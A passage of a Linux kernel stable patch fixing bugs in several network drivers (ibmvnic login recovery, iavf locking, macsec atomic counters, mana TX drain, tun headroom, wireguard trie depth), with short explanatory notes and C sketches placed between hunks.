+ 		if (!wait_for_completion_timeout(&adapter->init_done,
+ 						 timeout)) {
+-			netdev_warn(netdev, "Login timed out, retrying...\n");
+-			retry = true;
+-			adapter->init_done_rc = 0;
+-			retry_count++;
+-			continue;
++			netdev_warn(netdev, "Login timed out\n");
++			adapter->login_pending = false;
++			goto partial_reset;
+ 		}
+ 
+ 		if (adapter->init_done_rc == ABORTED) {
+@@ -1382,10 +1383,69 @@ static int ibmvnic_login(struct net_device *netdev)
+ 					    "SCRQ irq initialization failed\n");
+ 				return rc;
+ 			}
++		/* Default/timeout error handling, reset and start fresh */
+ 		} else if (adapter->init_done_rc) {
+ 			netdev_warn(netdev, "Adapter login failed, init_done_rc = %d\n",
+ 				    adapter->init_done_rc);
+-			return -EIO;
++
++partial_reset:
++			/* adapter login failed, so free any CRQs or sub-CRQs
++			 * and register again before attempting to login again.
++			 * If we don't do this then the VIOS may think that
++			 * we are already logged in and reject any subsequent
++			 * attempts
++			 */
++			netdev_warn(netdev,
++				    "Freeing and re-registering CRQs before attempting to login again\n");
++			retry = true;
++			adapter->init_done_rc = 0;
++			release_sub_crqs(adapter, true);
++			/* Much of this is similar logic as ibmvnic_probe(),
++			 * we are essentially re-initializing communication
++			 * with the server. We really should not run any
++			 * resets/failovers here because this is already a form
++			 * of reset and we do not want parallel resets occurring
++			 */
++			do {
++				reinit_init_done(adapter);
++				/* Clear any failovers we got in the previous
++				 * pass since we are re-initializing the CRQ
++				 */
++				adapter->failover_pending = false;
++				release_crq_queue(adapter);
++				/* If we don't sleep here then we risk an
++				 * unnecessary failover event from the VIOS.
++				 * This is a known VIOS issue caused by a vnic
++				 * device freeing and registering a CRQ too
++				 * quickly.
++				 */
++				msleep(1500);
++				/* Avoid any resets, since we are currently
++				 * resetting.
++				 */
++				spin_lock_irqsave(&adapter->rwi_lock, flags);
++				flush_reset_queue(adapter);
++				spin_unlock_irqrestore(&adapter->rwi_lock,
++						       flags);
++
++				rc = init_crq_queue(adapter);
++				if (rc) {
++					netdev_err(netdev, "login recovery: init CRQ failed %d\n",
++						   rc);
++					return -EIO;
++				}
++
++				rc = ibmvnic_reset_init(adapter, false);
++				if (rc)
++					netdev_err(netdev, "login recovery: Reset init failed %d\n",
++						   rc);
++				/* IBMVNIC_CRQ_INIT will return EAGAIN if it
++				 * fails, since ibmvnic_reset_init will free
++				 * irq's in failure, we won't be able to receive
++				 * new CRQs so we need to keep trying. probe()
++				 * handles this similarly.
++				 */
++			} while (rc == -EAGAIN && retry_count++ < retries);
+ 		}
+ 	} while (retry);
+ 
+@@ -1397,12 +1457,22 @@ static int ibmvnic_login(struct net_device *netdev)
+ 
+ static void release_login_buffer(struct ibmvnic_adapter *adapter)
+ {
++	if (!adapter->login_buf)
++		return;
++
++	dma_unmap_single(&adapter->vdev->dev, adapter->login_buf_token,
++			 adapter->login_buf_sz, DMA_TO_DEVICE);
+ 	kfree(adapter->login_buf);
+ 	adapter->login_buf = NULL;
+ }
+ 
+ static void release_login_rsp_buffer(struct ibmvnic_adapter *adapter)
+ {
++	if (!adapter->login_rsp_buf)
++		return;
++
++	dma_unmap_single(&adapter->vdev->dev, adapter->login_rsp_buf_token,
++			 adapter->login_rsp_buf_sz, DMA_FROM_DEVICE);
+ 	kfree(adapter->login_rsp_buf);
+ 	adapter->login_rsp_buf = NULL;
+ }
+@@ -4626,11 +4696,14 @@ static int send_login(struct ibmvnic_adapter *adapter)
+ 	if (rc) {
+ 		adapter->login_pending = false;
+ 		netdev_err(adapter->netdev, "Failed to send login, rc=%d\n", rc);
+-		goto buf_rsp_map_failed;
++		goto buf_send_failed;
+ 	}
+ 
+ 	return 0;
+ 
++buf_send_failed:
++	dma_unmap_single(dev, rsp_buffer_token, rsp_buffer_size,
++			 DMA_FROM_DEVICE);
+ buf_rsp_map_failed:
+ 	kfree(login_rsp_buffer);
+ 	adapter->login_rsp_buf = NULL;
+@@ -5192,6 +5265,7 @@ static int handle_login_rsp(union ibmvnic_crq *login_rsp_crq,
+ 	int num_tx_pools;
+ 	int num_rx_pools;
+ 	u64 *size_array;
++	u32 rsp_len;
+ 	int i;
+ 
+ 	/* CHECK: Test/set of login_pending does not need to be atomic
+@@ -5203,11 +5277,6 @@ static int handle_login_rsp(union ibmvnic_crq *login_rsp_crq,
+ 	}
+ 	adapter->login_pending = false;
+ 
+-	dma_unmap_single(dev, adapter->login_buf_token, adapter->login_buf_sz,
+-			 DMA_TO_DEVICE);
+-	dma_unmap_single(dev, adapter->login_rsp_buf_token,
+-			 adapter->login_rsp_buf_sz, DMA_FROM_DEVICE);
+-
+ 	/* If the number of queues requested can't be allocated by the
+ 	 * server, the login response will return with code 1. We will need
+ 	 * to resend the login buffer with fewer queues requested.
+@@ -5243,6 +5312,23 @@ static int handle_login_rsp(union ibmvnic_crq *login_rsp_crq,
+ 		ibmvnic_reset(adapter, VNIC_RESET_FATAL);
+ 		return -EIO;
+ 	}
++
++	rsp_len = be32_to_cpu(login_rsp->len);
++	if (be32_to_cpu(login->login_rsp_len) < rsp_len ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_txsubm_subcrqs) ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_rxadd_subcrqs) ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_rxadd_buff_size) ||
++	    rsp_len <= be32_to_cpu(login_rsp->off_supp_tx_desc)) {
++		/* This can happen if a login request times out and there are
++		 * 2 outstanding login requests sent, the LOGIN_RSP crq
++		 * could have been for the older login request. So we are
++		 * parsing the newer response buffer which may be incomplete
++		 */
++		dev_err(dev, "FATAL: Login rsp offsets/lengths invalid\n");
++		ibmvnic_reset(adapter, VNIC_RESET_FATAL);
++		return -EIO;
++	}
++
+ 	size_array = (u64 *)((u8 *)(adapter->login_rsp_buf) +
+ 		be32_to_cpu(adapter->login_rsp_buf->off_rxadd_buff_size));
+ 	/* variable buffer sizes are not supported, so just read the
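The new rsp_len checks are defensive parsing: before dereferencing any offset that arrives inside a device-provided response, verify that every offset actually falls inside the buffer that was received, since a stale response from an earlier timed-out request may be shorter than expected. A generic sketch of that validation, with a made-up layout:

#include <linux/kernel.h>
#include <linux/types.h>

struct my_rsp {
	__be32 len;	/* total response length, per the device */
	__be32 off_a;	/* offsets of arrays embedded in the response */
	__be32 off_b;
};

static bool my_rsp_offsets_valid(const struct my_rsp *rsp, u32 buf_size)
{
	u32 len = be32_to_cpu(rsp->len);

	/* Reject a response claiming more data than we mapped, or whose
	 * embedded offsets point at or past its own end.
	 */
	if (len > buf_size)
		return false;
	if (be32_to_cpu(rsp->off_a) >= len || be32_to_cpu(rsp->off_b) >= len)
		return false;

	return true;
}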
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index fd6d6f6263f66..f544d2b0abdbd 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -1401,14 +1401,15 @@ static int iavf_add_fdir_ethtool(struct iavf_adapter *adapter, struct ethtool_rx
+ 	if (fsp->flow_type & FLOW_MAC_EXT)
+ 		return -EINVAL;
+ 
++	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	if (adapter->fdir_active_fltr >= IAVF_MAX_FDIR_FILTERS) {
++		spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 		dev_err(&adapter->pdev->dev,
+ 			"Unable to add Flow Director filter because VF reached the limit of max allowed filters (%u)\n",
+ 			IAVF_MAX_FDIR_FILTERS);
+ 		return -ENOSPC;
+ 	}
+ 
+-	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	if (iavf_find_fdir_fltr_by_loc(adapter, fsp->location)) {
+ 		dev_err(&adapter->pdev->dev, "Failed to add Flow Director filter, it already exists\n");
+ 		spin_unlock_bh(&adapter->fdir_fltr_lock);
+@@ -1781,7 +1782,9 @@ static int iavf_get_rxnfc(struct net_device *netdev, struct ethtool_rxnfc *cmd,
+ 	case ETHTOOL_GRXCLSRLCNT:
+ 		if (!FDIR_FLTR_SUPPORT(adapter))
+ 			break;
++		spin_lock_bh(&adapter->fdir_fltr_lock);
+ 		cmd->rule_cnt = adapter->fdir_active_fltr;
++		spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 		cmd->data = IAVF_MAX_FDIR_FILTERS;
+ 		ret = 0;
+ 		break;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.c b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+index 6146203efd84a..505e82ebafe47 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+@@ -722,7 +722,9 @@ void iavf_print_fdir_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *f
+ bool iavf_fdir_is_dup_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr)
+ {
+ 	struct iavf_fdir_fltr *tmp;
++	bool ret = false;
+ 
++	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	list_for_each_entry(tmp, &adapter->fdir_list_head, list) {
+ 		if (tmp->flow_type != fltr->flow_type)
+ 			continue;
+@@ -732,11 +734,14 @@ bool iavf_fdir_is_dup_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *
+ 		    !memcmp(&tmp->ip_data, &fltr->ip_data,
+ 			    sizeof(fltr->ip_data)) &&
+ 		    !memcmp(&tmp->ext_data, &fltr->ext_data,
+-			    sizeof(fltr->ext_data)))
+-			return true;
++			    sizeof(fltr->ext_data))) {
++			ret = true;
++			break;
++		}
+ 	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+-	return false;
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/marvell/prestera/prestera_router.c b/drivers/net/ethernet/marvell/prestera/prestera_router.c
+index a9a1028cb17bb..de317179a7dcc 100644
+--- a/drivers/net/ethernet/marvell/prestera/prestera_router.c
++++ b/drivers/net/ethernet/marvell/prestera/prestera_router.c
+@@ -166,11 +166,11 @@ prestera_util_neigh2nc_key(struct prestera_switch *sw, struct neighbour *n,
+ 
+ static bool __prestera_fi_is_direct(struct fib_info *fi)
+ {
+-	struct fib_nh *fib_nh;
++	struct fib_nh_common *fib_nhc;
+ 
+ 	if (fib_info_num_path(fi) == 1) {
+-		fib_nh = fib_info_nh(fi, 0);
+-		if (fib_nh->fib_nh_gw_family == AF_UNSPEC)
++		fib_nhc = fib_info_nhc(fi, 0);
++		if (fib_nhc->nhc_gw_family == AF_UNSPEC)
+ 			return true;
+ 	}
+ 
+@@ -261,7 +261,7 @@ static bool
+ __prestera_util_kern_n_is_reachable_v4(u32 tb_id, __be32 *addr,
+ 				       struct net_device *dev)
+ {
+-	struct fib_nh *fib_nh;
++	struct fib_nh_common *fib_nhc;
+ 	struct fib_result res;
+ 	bool reachable;
+ 
+@@ -269,8 +269,8 @@ __prestera_util_kern_n_is_reachable_v4(u32 tb_id, __be32 *addr,
+ 
+ 	if (!prestera_util_kern_get_route(&res, tb_id, addr))
+ 		if (prestera_fi_is_direct(res.fi)) {
+-			fib_nh = fib_info_nh(res.fi, 0);
+-			if (dev == fib_nh->fib_nh_dev)
++			fib_nhc = fib_info_nhc(res.fi, 0);
++			if (dev == fib_nhc->nhc_dev)
+ 				reachable = true;
+ 		}
+ 
+@@ -324,7 +324,7 @@ prestera_kern_fib_info_nhc(struct fib_notifier_info *info, int n)
+ 	if (info->family == AF_INET) {
+ 		fen4_info = container_of(info, struct fib_entry_notifier_info,
+ 					 info);
+-		return &fib_info_nh(fen4_info->fi, n)->nh_common;
++		return fib_info_nhc(fen4_info->fi, n);
+ 	} else if (info->family == AF_INET6) {
+ 		fen6_info = container_of(info, struct fib6_entry_notifier_info,
+ 					 info);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+index d3a3fe4ce6702..7d9bbb494d95b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+@@ -574,7 +574,7 @@ static int __mlx5_lag_modify_definers_destinations(struct mlx5_lag *ldev,
+ 	for (i = 0; i < ldev->ports; i++) {
+ 		for (j = 0; j < ldev->buckets; j++) {
+ 			idx = i * ldev->buckets + j;
+-			if (ldev->v2p_map[i] == ports[i])
++			if (ldev->v2p_map[idx] == ports[idx])
+ 				continue;
+ 
+ 			dest.vport.vhca_id = MLX5_CAP_GEN(ldev->pf[ports[idx] - 1].dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+index d7ddfc489536e..2ac255bb918ba 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+@@ -198,10 +198,15 @@ static void mlx5_timestamp_overflow(struct work_struct *work)
+ 	clock = container_of(timer, struct mlx5_clock, timer);
+ 	mdev = container_of(clock, struct mlx5_core_dev, clock);
+ 
++	if (mdev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR)
++		goto out;
++
+ 	write_seqlock_irqsave(&clock->lock, flags);
+ 	timecounter_read(&timer->tc);
+ 	mlx5_update_clock_info_page(mdev);
+ 	write_sequnlock_irqrestore(&clock->lock, flags);
++
++out:
+ 	schedule_delayed_work(&timer->overflow_work, timer->overflow_period);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 077204929fe4a..6ab0642e9de78 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1794,7 +1794,7 @@ static pci_ers_result_t mlx5_pci_err_detected(struct pci_dev *pdev,
+ 
+ 	mlx5_enter_error_state(dev, false);
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one(dev, true);
++	mlx5_unload_one(dev, false);
+ 	mlx5_drain_health_wq(dev);
+ 	mlx5_pci_disable_device(dev);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index 20d7662c10fb6..5f2195e65dd62 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -264,8 +264,7 @@ static u16 mlx5_get_max_vfs(struct mlx5_core_dev *dev)
+ 		host_total_vfs = MLX5_GET(query_esw_functions_out, out,
+ 					  host_params_context.host_total_vfs);
+ 		kvfree(out);
+-		if (host_total_vfs)
+-			return host_total_vfs;
++		return host_total_vfs;
+ 	}
+ 
+ done:
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index 27a0f3af8aab4..4f4204432aaa3 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -8,6 +8,7 @@
+ #include <linux/ethtool.h>
+ #include <linux/filter.h>
+ #include <linux/mm.h>
++#include <linux/pci.h>
+ 
+ #include <net/checksum.h>
+ #include <net/ip6_checksum.h>
+@@ -1972,9 +1973,12 @@ int mana_attach(struct net_device *ndev)
+ static int mana_dealloc_queues(struct net_device *ndev)
+ {
+ 	struct mana_port_context *apc = netdev_priv(ndev);
++	unsigned long timeout = jiffies + 120 * HZ;
+ 	struct gdma_dev *gd = apc->ac->gdma_dev;
+ 	struct mana_txq *txq;
++	struct sk_buff *skb;
+ 	int i, err;
++	u32 tsleep;
+ 
+ 	if (apc->port_is_up)
+ 		return -EINVAL;
+@@ -1990,15 +1994,40 @@ static int mana_dealloc_queues(struct net_device *ndev)
+ 	 * to false, but it doesn't matter since mana_start_xmit() drops any
+ 	 * new packets due to apc->port_is_up being false.
+ 	 *
+-	 * Drain all the in-flight TX packets
++	 * Drain all the in-flight TX packets.
++	 * A single 120-second budget is shared by all the queues; it
++	 * breaks out of the while loop when the hardware stops
++	 * responding. The value was chosen with the maximum possible
++	 * number of queues in mind.
+ 	 */
++
+ 	for (i = 0; i < apc->num_queues; i++) {
+ 		txq = &apc->tx_qp[i].txq;
+-
+-		while (atomic_read(&txq->pending_sends) > 0)
+-			usleep_range(1000, 2000);
++		tsleep = 1000;
++		while (atomic_read(&txq->pending_sends) > 0 &&
++		       time_before(jiffies, timeout)) {
++			usleep_range(tsleep, tsleep + 1000);
++			tsleep <<= 1;
++		}
++		if (atomic_read(&txq->pending_sends)) {
++			err = pcie_flr(to_pci_dev(gd->gdma_context->dev));
++			if (err) {
++				netdev_err(ndev, "flr failed %d with %d pkts pending in txq %u\n",
++					   err, atomic_read(&txq->pending_sends),
++					   txq->gdma_txq_id);
++			}
++			break;
++		}
+ 	}
+ 
++	for (i = 0; i < apc->num_queues; i++) {
++		txq = &apc->tx_qp[i].txq;
++		while ((skb = skb_dequeue(&txq->pending_skbs))) {
++			mana_unmap_skb(skb, apc);
++			dev_kfree_skb_any(skb);
++		}
++		atomic_set(&txq->pending_sends, 0);
++	}
+ 	/* We're 100% sure the queues can no longer be woken up, because
+ 	 * we're sure now mana_poll_tx_cq() can't be running.
+ 	 */
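
The mana drain loop above replaces an unbounded 1-2 ms poll with an
exponential backoff under a 120-second deadline, escalating to a PCI FLR if
packets are still pending, and then reaps whatever is left on pending_skbs.
A rough userspace model of the backoff-with-deadline part (constants and
names are illustrative):

#include <stdatomic.h>
#include <stdbool.h>
#include <time.h>
#include <unistd.h>

#define DRAIN_BUDGET_SEC 120

static bool drain_queue(atomic_int *pending)
{
	time_t deadline = time(NULL) + DRAIN_BUDGET_SEC;
	useconds_t tsleep = 1000;	/* start at 1 ms, double each pass */

	while (atomic_load(pending) > 0 && time(NULL) < deadline) {
		usleep(tsleep);
		tsleep <<= 1;
	}
	return atomic_load(pending) == 0; /* false => caller escalates */
}

The doubling keeps the wait cheap when the hardware answers quickly while
still bounding the total time when it never does.
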
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 983cabf9a0f67..6a7965ed63001 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -743,7 +743,7 @@ static bool macsec_post_decrypt(struct sk_buff *skb, struct macsec_secy *secy, u
+ 		u64_stats_update_begin(&rxsc_stats->syncp);
+ 		rxsc_stats->stats.InPktsLate++;
+ 		u64_stats_update_end(&rxsc_stats->syncp);
+-		secy->netdev->stats.rx_dropped++;
++		DEV_STATS_INC(secy->netdev, rx_dropped);
+ 		return false;
+ 	}
+ 
+@@ -767,7 +767,7 @@ static bool macsec_post_decrypt(struct sk_buff *skb, struct macsec_secy *secy, u
+ 			rxsc_stats->stats.InPktsNotValid++;
+ 			u64_stats_update_end(&rxsc_stats->syncp);
+ 			this_cpu_inc(rx_sa->stats->InPktsNotValid);
+-			secy->netdev->stats.rx_errors++;
++			DEV_STATS_INC(secy->netdev, rx_errors);
+ 			return false;
+ 		}
+ 
+@@ -1059,7 +1059,7 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 			u64_stats_update_begin(&secy_stats->syncp);
+ 			secy_stats->stats.InPktsNoTag++;
+ 			u64_stats_update_end(&secy_stats->syncp);
+-			macsec->secy.netdev->stats.rx_dropped++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 			continue;
+ 		}
+ 
+@@ -1169,7 +1169,7 @@ static rx_handler_result_t macsec_handle_frame(struct sk_buff **pskb)
+ 		u64_stats_update_begin(&secy_stats->syncp);
+ 		secy_stats->stats.InPktsBadTag++;
+ 		u64_stats_update_end(&secy_stats->syncp);
+-		secy->netdev->stats.rx_errors++;
++		DEV_STATS_INC(secy->netdev, rx_errors);
+ 		goto drop_nosa;
+ 	}
+ 
+@@ -1186,7 +1186,7 @@ static rx_handler_result_t macsec_handle_frame(struct sk_buff **pskb)
+ 			u64_stats_update_begin(&rxsc_stats->syncp);
+ 			rxsc_stats->stats.InPktsNotUsingSA++;
+ 			u64_stats_update_end(&rxsc_stats->syncp);
+-			secy->netdev->stats.rx_errors++;
++			DEV_STATS_INC(secy->netdev, rx_errors);
+ 			if (active_rx_sa)
+ 				this_cpu_inc(active_rx_sa->stats->InPktsNotUsingSA);
+ 			goto drop_nosa;
+@@ -1220,7 +1220,7 @@ static rx_handler_result_t macsec_handle_frame(struct sk_buff **pskb)
+ 			u64_stats_update_begin(&rxsc_stats->syncp);
+ 			rxsc_stats->stats.InPktsLate++;
+ 			u64_stats_update_end(&rxsc_stats->syncp);
+-			macsec->secy.netdev->stats.rx_dropped++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 			goto drop;
+ 		}
+ 	}
+@@ -1261,7 +1261,7 @@ deliver:
+ 	if (ret == NET_RX_SUCCESS)
+ 		count_rx(dev, len);
+ 	else
+-		macsec->secy.netdev->stats.rx_dropped++;
++		DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 
+ 	rcu_read_unlock();
+ 
+@@ -1298,7 +1298,7 @@ nosci:
+ 			u64_stats_update_begin(&secy_stats->syncp);
+ 			secy_stats->stats.InPktsNoSCI++;
+ 			u64_stats_update_end(&secy_stats->syncp);
+-			macsec->secy.netdev->stats.rx_errors++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_errors);
+ 			continue;
+ 		}
+ 
+@@ -1317,7 +1317,7 @@ nosci:
+ 			secy_stats->stats.InPktsUnknownSCI++;
+ 			u64_stats_update_end(&secy_stats->syncp);
+ 		} else {
+-			macsec->secy.netdev->stats.rx_dropped++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 		}
+ 	}
+ 
+@@ -3418,7 +3418,7 @@ static netdev_tx_t macsec_start_xmit(struct sk_buff *skb,
+ 
+ 	if (!secy->operational) {
+ 		kfree_skb(skb);
+-		dev->stats.tx_dropped++;
++		DEV_STATS_INC(dev, tx_dropped);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -3426,7 +3426,7 @@ static netdev_tx_t macsec_start_xmit(struct sk_buff *skb,
+ 	skb = macsec_encrypt(skb, dev);
+ 	if (IS_ERR(skb)) {
+ 		if (PTR_ERR(skb) != -EINPROGRESS)
+-			dev->stats.tx_dropped++;
++			DEV_STATS_INC(dev, tx_dropped);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -3663,9 +3663,9 @@ static void macsec_get_stats64(struct net_device *dev,
+ 
+ 	dev_fetch_sw_netstats(s, dev->tstats);
+ 
+-	s->rx_dropped = dev->stats.rx_dropped;
+-	s->tx_dropped = dev->stats.tx_dropped;
+-	s->rx_errors = dev->stats.rx_errors;
++	s->rx_dropped = atomic_long_read(&dev->stats.__rx_dropped);
++	s->tx_dropped = atomic_long_read(&dev->stats.__tx_dropped);
++	s->rx_errors = atomic_long_read(&dev->stats.__rx_errors);
+ }
+ 
+ static int macsec_get_iflink(const struct net_device *dev)
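
The macsec hunks switch every drop/error counter from a plain ++ on
dev->stats to DEV_STATS_INC(), and get_stats64 to atomic_long_read(),
because these paths run concurrently without a common lock and non-atomic
increments can lose counts. The idea in portable C11 (field and macro names
here are illustrative):

#include <stdatomic.h>

struct dev_stats {
	atomic_long rx_dropped;
	atomic_long tx_dropped;
	atomic_long rx_errors;
};

#define DEV_STATS_INC(s, f) atomic_fetch_add(&(s)->f, 1)

static long snapshot_rx_dropped(struct dev_stats *s)
{
	return atomic_load(&s->rx_dropped);	/* consistent reader side */
}
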
+diff --git a/drivers/net/phy/at803x.c b/drivers/net/phy/at803x.c
+index d499659075614..61824a463df85 100644
+--- a/drivers/net/phy/at803x.c
++++ b/drivers/net/phy/at803x.c
+@@ -2087,8 +2087,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.config_init		= at803x_config_init,
+ 	.link_change_notify	= at803x_link_change_notify,
+-	.set_wol		= at803x_set_wol,
+-	.get_wol		= at803x_get_wol,
+ 	.suspend		= at803x_suspend,
+ 	.resume			= at803x_resume,
+ 	/* PHY_BASIC_FEATURES */
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 228f5f9ef1dde..7544df1ff50ec 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -1588,7 +1588,7 @@ static bool tun_can_build_skb(struct tun_struct *tun, struct tun_file *tfile,
+ 	if (zerocopy)
+ 		return false;
+ 
+-	if (SKB_DATA_ALIGN(len + TUN_RX_PAD) +
++	if (SKB_DATA_ALIGN(len + TUN_RX_PAD + XDP_PACKET_HEADROOM) +
+ 	    SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) > PAGE_SIZE)
+ 		return false;
+ 
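
The tun check above must count XDP_PACKET_HEADROOM, since the buffer that
tun_build_skb() lays out reserves that headroom before the payload; leaving
it out lets a frame pass the check and then overrun the single page once
headroom plus skb_shared_info are added. Sketch of the corrected arithmetic
with made-up constants:

#include <stdbool.h>
#include <stddef.h>

#define PAGE_SZ		4096
#define RX_PAD		32
#define XDP_HEADROOM	256
#define SHINFO_SZ	320
#define ALIGN_UP(x, a)	(((x) + (a) - 1) & ~((size_t)(a) - 1))

/* Count every byte the buffer will really contain before deciding
 * it fits in one page. */
static bool can_build_in_page(size_t len)
{
	return ALIGN_UP(len + RX_PAD + XDP_HEADROOM, 64) +
	       ALIGN_UP(SHINFO_SZ, 64) <= PAGE_SZ;
}
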
+diff --git a/drivers/net/vxlan/vxlan_vnifilter.c b/drivers/net/vxlan/vxlan_vnifilter.c
+index 3e04af4c5daa1..c5cf55030158f 100644
+--- a/drivers/net/vxlan/vxlan_vnifilter.c
++++ b/drivers/net/vxlan/vxlan_vnifilter.c
+@@ -713,6 +713,12 @@ static struct vxlan_vni_node *vxlan_vni_alloc(struct vxlan_dev *vxlan,
+ 	return vninode;
+ }
+ 
++static void vxlan_vni_free(struct vxlan_vni_node *vninode)
++{
++	free_percpu(vninode->stats);
++	kfree(vninode);
++}
++
+ static int vxlan_vni_add(struct vxlan_dev *vxlan,
+ 			 struct vxlan_vni_group *vg,
+ 			 u32 vni, union vxlan_addr *group,
+@@ -740,7 +746,7 @@ static int vxlan_vni_add(struct vxlan_dev *vxlan,
+ 					    &vninode->vnode,
+ 					    vxlan_vni_rht_params);
+ 	if (err) {
+-		kfree(vninode);
++		vxlan_vni_free(vninode);
+ 		return err;
+ 	}
+ 
+@@ -763,8 +769,7 @@ static void vxlan_vni_node_rcu_free(struct rcu_head *rcu)
+ 	struct vxlan_vni_node *v;
+ 
+ 	v = container_of(rcu, struct vxlan_vni_node, rcu);
+-	free_percpu(v->stats);
+-	kfree(v);
++	vxlan_vni_free(v);
+ }
+ 
+ static int vxlan_vni_del(struct vxlan_dev *vxlan,
+diff --git a/drivers/net/wireguard/allowedips.c b/drivers/net/wireguard/allowedips.c
+index 5bf7822c53f18..0ba714ca5185c 100644
+--- a/drivers/net/wireguard/allowedips.c
++++ b/drivers/net/wireguard/allowedips.c
+@@ -6,7 +6,7 @@
+ #include "allowedips.h"
+ #include "peer.h"
+ 
+-enum { MAX_ALLOWEDIPS_BITS = 128 };
++enum { MAX_ALLOWEDIPS_DEPTH = 129 };
+ 
+ static struct kmem_cache *node_cache;
+ 
+@@ -42,7 +42,7 @@ static void push_rcu(struct allowedips_node **stack,
+ 		     struct allowedips_node __rcu *p, unsigned int *len)
+ {
+ 	if (rcu_access_pointer(p)) {
+-		if (WARN_ON(IS_ENABLED(DEBUG) && *len >= MAX_ALLOWEDIPS_BITS))
++		if (WARN_ON(IS_ENABLED(DEBUG) && *len >= MAX_ALLOWEDIPS_DEPTH))
+ 			return;
+ 		stack[(*len)++] = rcu_dereference_raw(p);
+ 	}
+@@ -55,7 +55,7 @@ static void node_free_rcu(struct rcu_head *rcu)
+ 
+ static void root_free_rcu(struct rcu_head *rcu)
+ {
+-	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_BITS] = {
++	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_DEPTH] = {
+ 		container_of(rcu, struct allowedips_node, rcu) };
+ 	unsigned int len = 1;
+ 
+@@ -68,7 +68,7 @@ static void root_free_rcu(struct rcu_head *rcu)
+ 
+ static void root_remove_peer_lists(struct allowedips_node *root)
+ {
+-	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_BITS] = { root };
++	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_DEPTH] = { root };
+ 	unsigned int len = 1;
+ 
+ 	while (len > 0 && (node = stack[--len])) {
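
The rename from MAX_ALLOWEDIPS_BITS (128) to MAX_ALLOWEDIPS_DEPTH (129)
above reflects what the constant actually bounds: the explicit DFS stack
holds nodes, and a path in a binary trie over 128-bit keys can contain 129
nodes once the root is counted. A sketch of the traversal shape being
protected (simplified node type):

#include <stdlib.h>

enum { MAX_TRIE_DEPTH = 129 };	/* 128 key bits + 1 for the root */

struct node {
	struct node *bit[2];
};

/* Free a binary trie iteratively with a fixed stack; the bound must
 * be the maximum path length in nodes, not in key bits. */
static void trie_free(struct node *root)
{
	struct node *stack[MAX_TRIE_DEPTH];
	unsigned int len = 0;

	if (root)
		stack[len++] = root;
	while (len > 0) {
		struct node *n = stack[--len];

		if (n->bit[0])
			stack[len++] = n->bit[0];
		if (n->bit[1])
			stack[len++] = n->bit[1];
		free(n);
	}
}

The selftest hunk that follows builds exactly such a maximum-depth trie so
the off-by-one would trip the WARN_ON if it ever regressed.
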
+diff --git a/drivers/net/wireguard/selftest/allowedips.c b/drivers/net/wireguard/selftest/allowedips.c
